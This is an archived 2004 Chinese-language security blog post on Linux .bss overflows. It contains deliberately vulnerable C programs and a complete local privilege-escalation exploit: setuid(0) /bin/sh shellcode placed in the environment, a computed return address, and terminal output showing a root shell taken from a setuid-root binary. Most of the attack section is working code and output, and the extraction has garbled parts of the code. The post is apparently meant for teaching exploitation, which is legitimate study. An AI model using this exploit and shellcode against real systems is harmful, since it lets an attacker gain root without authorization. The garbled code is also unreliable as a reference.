Bytes#ph4nt0m.org
来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/index.php?blogid=37891&m=20041023 存档链接: https://web.archive.org/web/20041125185645id_/http://www.blogbus.com:80/blogbus/blog/index.php?blogid=37891&m=20041023
Bytes#ph4nt0m.org Bytes#ph4nt0m.org 首页 Tips (4) Diary (7) Work (5) Stuff (3) Other (9) About (0) 2004 年 10 月 Sun Mon Tue Wen Thu Fri Sat 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 最后更新 关于Linux .bss溢出 心声 最难的事 Share一个垃圾 马赛曲 Many Many more ... Telnet fingerprint Scanner:PTS-TSN_OS[scanner].c 两个面 米兰米兰 ZT-保护好你的妻子。 保护好爱你的人 最新评论 傲少 : 汗。这个是山贼泡. Bytes : 撒泡尿写下到此一. 存档 2004/01/02/-2004/10/01 我的链接 Ph4nt0m Jsk 死丫头Ann宝宝 蓝蓝 blog Oyxin(肉堆) blog Eong(毛毛) blog 分页 关于Linux .bss溢出 - 2004-10-23 08:36 /* ** BSS overflow vulnerable program ** ** By Bytes<Bytes[at]ph4nt0m.org> ** ** Ph4nt0m Security Team --- http://www.ph4nt0m.org/ / #include <stdio.h> #include <stdlib.h> #include <string.h> int main ( int c , char * v []){ static char buf [ 16 ], n ,* cmd ; // BSS if( c != 3 ){ fprintf ( stderr , "usage:%s \n" , v [ 0 ]); return ; } cmd
"/usr/bin/id" ; // 将被覆盖的静态指针 printf ( "buf addr = %p,cmd addr = %p,diff = %d\n" , buf , cmd ,( unsigned long )& cmd
- (
unsigned long
)
buf
);
printf
(
"CMD = %s addr = %p argv[1] = %p\n"
,
cmd
,
cmd
,
v
[
1
]);
strncpy
(
buf
,
v
[
2
],
strlen
(
v
[
2
]));
printf
(
"Now CMD = %s addr = %p\n"
,
cmd
,
cmd
);
system
(
cmd
);
}
[Bytes@BytesWorkStation2# heap]$ ./bss
usage:./bss
[Bytes@BytesWorkStation2# heap]$ ./bss 1 1
buf addr = 0x80497b8,cmd addr = 0x80485fb,diff = 20
CMD = /usr/bin/id addr = 0x80485fb argv[1] = 0xbffffb6b
Now CMD = /usr/bin/id addr = 0x80485fb
uid=624(Bytes) gid=624(Test) groups=624(Test)
[Bytes@BytesWorkStation2# heap]$ ./bss '/bin/bash;'
perl -e 'print "B"x20 ."\x28\xfb\xff\xbf"'buf addr = 0x80497b8,cmd addr = 0x80485fb,diff = 20 CMD = /usr/bin/id addr = 0x80485fb argv[1] = 0xbffffb2a Now CMD = /bin/bash; addr = 0xbffffb2a [Bytes@BytesWorkStation2# heap]$ [Bytes@BytesWorkStation2# heap]$ ps PID TTY TIME CMD 25583 pts/0 00:00:00 bash 25997 pts/0 00:00:00 bss 25998 pts/0 00:00:00 bash 26070 pts/0 00:00:00 ps 填充20个字节的垃圾数据,刚好覆盖到指针n,最后用/bin/bash;(加';'是为了保证命令正确执行,不被溢出后垃圾数据干扰,当然你也可以用'#'等字符)的地址覆盖cmd指针,该地址可以在一定范围进行猜测,也可以准确计算获得,本例为了方便起见,在缺陷程序中直接输出了.下面是一个更实际一点的例子,相同的原理,我们填充足够多的数据(260字节垃圾数据+4字节地址量,该地址指向一段可执行机器码---shellcode)就可以覆盖得到函数指针一个shell. Codz: /* Example vulnerable .bss section overflow Challenge one SolarIce 2004 www.covertsystems.org */ #include <string.h> #include <stdlib.h> #define LEN 256 void output ( char ); int main ( int argc , char ** argv ) { static char buffer [ LEN ]; static void ( func ) ( char *); func = output ; strcpy ( buffer , argv [ 1 ]); func ( buffer ); return EXIT_SUCCESS ; } void output ( char
string ) { fprintf ( stdout , "%s" , string ); } 攻击代码如下: Codz: /* ** Exploit for CRS .bss section overflow Challenge one ** ** Code By Bytes<Bytes[at]ph4nt0m.org> ** Put shellcode to Environment ** ** Ph4nt0m Security Team --- http://www.ph4nt0m.org/ ** / #include <stdio.h> #include <stdlib.h> #include <string.h> #define bufsize 260 / setuid(0) shellcode by by Matias Sedalo 3x ^_^ */ char shellcode [] = "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" ; int main ( void ){ char buf [ bufsize ] ; char * proc []={ "./bss2" , buf , NULL }; char * envir []={ "Bytes=2Lu" , shellcode , NULL }; unsigned long ret_addr
0xc0000000
strlen ( proc [ 0 ]) - strlen ( shellcode )- sizeof ( void *) - 0x02 ; memset ( buf , 0x42 , sizeof ( buf )); memcpy ( buf + bufsize
4 ,( char *)& ret_addr , 4 ); execve ( proc [ 0 ], proc , envir ); return 0 ; } [Bytes@BytesWorkStation2# heap]$ ls -al bss2 -rwsr-sr-x 1 root root 11865 Oct 23 08:25 bss2 [Bytes@BytesWorkStation2# heap]$ id uid=624(Bytes) gid=624(Test) groups=624(Test) [Bytes@BytesWorkStation2# heap]$ ./expbss2 sh-2.05b# id uid=0(root) gid=624(Test) groups=624(Test) sh-2.05b# Bytes 发表于 08:36 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑 分页